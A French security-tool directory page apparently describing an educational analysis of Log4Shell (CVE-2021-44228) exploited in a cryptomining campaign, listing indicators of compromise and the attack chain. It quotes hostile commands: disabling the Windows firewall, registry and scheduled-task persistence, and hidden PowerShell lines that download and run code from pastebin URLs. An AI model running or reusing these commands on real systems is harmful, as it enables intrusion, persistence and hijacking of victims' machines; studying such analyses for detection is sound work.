Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

FluxContactConfidentialité© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Log4j-Vulnerability — Analyse pédagogique de la vulnérabilité Log4Shell (CVE-2021-44228), détaillant son exploitation dans une campagne de minage de cryptomonnaie avec des IoCs, la cartographie MITRE ATT&CK, et des conseils de détection. | Kitploit
Outils/GitHubGitHub/demining/log4j-vulnerability
Gestion des Indicateurs de Compromission (IOC)Analyse des VulnérabilitésExploitationAnalyse de MalwareRenseignement sur les MenacesApprentissage et Éducation
GitHubdemining/log4j-vulnerability

Log4j-Vulnerability

Analyse pédagogique de la vulnérabilité Log4Shell (CVE-2021-44228), détaillant son exploitation dans une campagne de minage de cryptomonnaie avec des IoCs, la cartographie MITRE ATT&CK, et des conseils de détection.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Voir le dépôtSite web
6254il y a 3 ansPas encore vérifié
Partager

Vulnérabilité Log4j



Exploitation dans le code de minage de crypto-monnaie utilisant une dangereuse vulnérabilité Log4j
  • Tutoriel: https://youtu.be/PNDBjoT83zA
  • Tutoriel: https://cryptodeeptech.ru/log4j-vulnerability


Contexte sur Log4j

L'équipe de sécurité d'Alibaba Cloud a divulgué publiquement une vulnérabilité critique (CVE-2021-44228) permettant une exécution de code à distance non authentifiée contre plusieurs versions d'Apache Log4j2 (Log4Shell). Les serveurs vulnérables peuvent être exploités par des attaquants se connectant via tout protocole tel que HTTPS et envoyant une chaîne spécialement conçue.

Campagne de minage de crypto-monnaie via Log4j

Darktrace a détecté du minage de crypto-monnaie sur plusieurs déploiements clients résultant de l'exploitation de cette vulnérabilité Log4j. Dans chacun de ces incidents, l'exploitation s'est produite via des connexions SSL sortantes qui semblaient être des demandes de scripts PowerShell encodés en base64 pour contourner les défenses périmétriques et télécharger des fichiers de script batch (.bat) et plusieurs exécutables installant des logiciels malveillants de minage. L'activité présentait des indicateurs de campagne plus larges, notamment des IP codées en dur, des fichiers exécutables et des scripts communs.

Le cycle d'attaque commence par ce qui semble être un balayage opportuniste d'appareils connectés à Internet à la recherche de serveurs VMWare Horizons vulnérables à l'exploit Log4j. Une fois un serveur vulnérable trouvé, l'attaquant établit des connexions HTTP et SSL vers la victime. Après une exploitation réussie, le serveur effectue un rappel sur le port 1389, récupérant un script nommé mad_micky.bat. Cela permet d'obtenir les résultats suivants :

  • Désactive le pare-feu Windows en mettant tous les profils à état=désactivé
    ‘netsh advfirewall set allprofiles state off’
  • Recherche les processus existants indiquant d'autres installations de mineurs en utilisant ‘netstat -ano | findstr TCP’ pour identifier tout processus fonctionnant sur les ports :3333, :4444, :5555, :7777, :9000 et arrêter les processus en cours
  • Un nouveau client web est initié pour télécharger silencieusement wxm.exe
  • Des tâches planifiées sont utilisées pour créer une persistance. La commande ‘schtasks /create /F /sc minute /mo 1 /tn –‘ planifie une tâche et supprime les avertissements, la tâche doit être programmée dans la minute suivant la commande et porte le nom ‘BrowserUpdate’, pointant vers le domaine malveillant ‘b.oracleservice[.]top’ et les IP codées en dur : 198.23.214[.]117:8080 -o 51.79.175[.]139:8080 -o 167.114.114[.]169:8080
  • Des clés de registre sont ajoutées dans RunOnce pour la persistance : reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Run2 /d

Dans au moins deux cas, le script mad_micky.bat a été récupéré lors d'une connexion HTTP avec l'agent utilisateur Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; MAARJS). C'était la première et unique fois que cet agent utilisateur était vu sur ces réseaux. Il semble que cet agent utilisateur soit utilisé légitimement par certains appareils ASUS avec des installations neuves d'usine ; cependant, en tant que nouvel agent utilisateur vu uniquement lors de cette activité, il est suspect.

Après une exploitation réussie, le serveur effectue un rappel sur le port 1389 pour récupérer des fichiers de script. Dans cet exemple, /xms.ps1 est un script PowerShell encodé en base64 qui contourne la stratégie d'exécution sur l'hôte pour appeler ‘mad_micky.bat’ :

Exploitation dans le code de minage de crypto-monnaie utilisant une dangereuse vulnérabilité Log4j

Figure 1 : Informations supplémentaires sur le script PowerShell xms.ps1

L'instantané détaille le journal des événements pour un serveur affecté et indique une RCE Log4j réussie qui a entraîné le téléchargement du fichier mad_micky.bat :

Exploitation dans le code de minage de crypto-monnaie utilisant une dangereuse vulnérabilité Log4j

Figure 2 : Données de journal mettant en évidence le fichier mad_micky.bat

Des connexions supplémentaires ont été initiées pour récupérer des fichiers exécutables et des scripts. Les scripts contenaient deux adresses IP situées en Corée et en Ukraine. Une connexion a été établie avec l'IP ukrainienne pour télécharger le fichier exécutable xm.exe, qui active le mineur. Le mineur, XMRig Miner (dans ce cas), est un outil de minage open source multiplateforme disponible en téléchargement à partir de plusieurs emplacements publics. Le prochain téléchargement d'exe observé était pour ‘wxm.exe’ (f0cf1d3d9ed23166ff6c1f3deece19b4).

Exploitation dans le code de minage de crypto-monnaie utilisant une dangereuse vulnérabilité Log4j

Figure 3 : Informations supplémentaires concernant l'exécutable XMRig

La connexion à l'IP coréenne impliquait une demande d'un autre script (/2.ps1) ainsi que d'un fichier exécutable (LogBack.exe). Ce script supprime les tâches en cours associées à la journalisation, y compris le filtre de journal d'événements SCM ou le consommateur de journal d'événements PowerShell. Le script demande également un fichier depuis Pastebin, qui est probablement un fichier de configuration de beacon Cobalt Strike. Les suppressions de journaux ont été effectuées via des tâches planifiées et WMI, incluant : Eventlogger, SCM Event Log Filter, DSM Event Log Consumer, PowerShell Event Log Consumer, Windows Events Consumer, BVTConsumer.

  • Fichier de configuration (plus hébergé) : IEX (New-Object System.Net.Webclient) DownloadString(‘hxxps://pastebin.com/raw/g93wWHkR’)

Le deuxième fichier demandé depuis Pastebin, bien que n'étant plus hébergé par Pastebin, fait partie d'une commande schtasks, et donc probablement utilisé pour établir une persistance :

  • schtasks /create /sc MINUTE /mo 5 /tn  “\Microsoft\windows\.NET Framework\.NET Framework NGEN v4.0.30319 32” /tr “c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c ‘IEX ((new-object net.webclient).downloadstring(”hxxps://pastebin.com/raw/bcFqDdXx”’))'”  /F /ru System
Télécharger l’outil